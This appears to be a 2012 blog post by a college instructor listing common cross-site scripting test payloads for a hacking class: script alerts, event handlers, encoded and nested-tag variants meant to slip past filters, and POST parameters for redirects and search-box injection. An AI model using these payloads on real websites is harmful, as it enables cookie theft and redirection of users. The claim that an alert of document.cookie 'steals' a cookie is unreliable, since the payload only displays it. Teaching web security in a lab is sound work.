These were compiled in September of 2012 – if you are reading this way off in the future – you will want to go back and verify that these still work.
So what types of testing can you do for Cross Site Scripting? This is a quick collection of standard Cross Site Scripting Notation from around the internet, security blogs, security sites, and some of the more interesting underground web sites out there. These are just examples of the code that you can use to do cross site scripting.
<script>alert(document.cookie);</script> this will steal someone else’s cookie or otherwise access a cookie that you might not otherwise have access to.
<body onload=alert(‘test’)> loads the XSS using the body onload command
<script>alert(‘Xss By Your Name here’)</script> using a standard java script alert notation
SomePage.php?url=http://EvilHackerSite.com simple redirect to a page of your choice
</script><script>alert%28document.cookie%29</script><script> nested script tags for evasion if you think the site you are looking at is protected by a Firewall or other security system
%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E using UTF8 or other encoding for evasion processes.
POST: retURL=http%3A%2F%2Fwww.xssed.com%2F using the post command to redirect to a different URL than intended
POST: keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0 using post to subvert the internal site search engine (all sites have a search feature unless they are horribly out of date)
There are a lot of places out there that have a lot of very good examples. These were pulled from XSSED.com and Hackers.org and CGI-Security. These are being used in my Application Hacking class at Highline Community College, in a private network, with known vulnerable software. No system was compromised in the pursuit of this knowledge. Please don’t try this at home.